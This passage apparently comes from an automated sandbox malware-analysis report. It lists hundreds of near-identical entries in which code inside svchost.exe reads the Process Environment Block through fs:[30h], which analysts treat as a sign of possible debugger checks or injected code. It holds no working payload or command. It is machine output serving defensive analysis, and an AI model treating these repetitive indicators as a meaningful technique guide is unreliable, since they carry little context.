Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h] 2_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h] 2_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h] 2_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h] 2_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] 2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h] 2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h] 2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h] 2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h] 2_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h] 2_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h] 2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h] 2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h] 2_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] 2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h] 2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h] 2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h] 2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h] 2_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h] 2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h] 2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h] 2_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h] 2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h] 2_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h] 2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h] 2_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h] 2_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h] 2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h] 2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h] 2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h] 2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h] 2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h] 2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h] 2_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h] 2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h] 2_2_039280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h] 2_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h] 2_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h] 2_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h] 2_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h] 2_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h] 2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h] 2_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h] 2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h] 2_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h] 2_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h] 2_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h] 2_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h] 2_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h] 2_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h] 2_2_039D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h] 2_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h] 2_2_039E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h] 2_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h] 2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h] 2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] 2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] 2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h] 2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h] 2_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03960710 mov eax, dword ptr fs:[00000030h] 2_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h] 2_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h] 2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h] 2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h] 2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h] 2_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h] 2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h] 2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930750 mov eax, dword ptr fs:[00000030h] 2_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h] 2_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h] 2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h] 2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h] 2_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396674D mov esi, dword ptr fs:[00000030h] 2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h] 2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h] 2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938770 mov eax, dword ptr fs:[00000030h] 2_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] 2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h] 2_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h] 2_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h] 2_2_039666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0396C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h] 2_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h] 2_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03972619 mov eax, dword ptr fs:[00000030h] 2_2_03972619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h] 2_2_039AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h] 2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h] 2_2_0394E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03966620 mov eax, dword ptr fs:[00000030h] 2_2_03966620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968620 mov eax, dword ptr fs:[00000030h] 2_2_03968620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393262C mov eax, dword ptr fs:[00000030h] 2_2_0393262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h] 2_2_0394C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03962674 mov eax, dword ptr fs:[00000030h] 2_2_03962674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F866E mov eax, dword ptr fs:[00000030h] 2_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F866E mov eax, dword ptr fs:[00000030h] 2_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h] 2_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h] 2_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h] 2_2_0396E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03932582 mov eax, dword ptr fs:[00000030h] 2_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h] 2_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03964588 mov eax, dword ptr fs:[00000030h] 2_2_03964588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h] 2_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h] 2_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h] 2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h] 2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h] 2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h] 2_2_039365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h] 2_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h] 2_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h] 2_2_039325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h] 2_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h] 2_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h] 2_2_039C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h] 2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h] 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h] 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h] 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h] 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h] 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h] 2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h] 2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h] 2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h] 2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h] 2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h] 2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h] 2_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h] 2_2_03938550
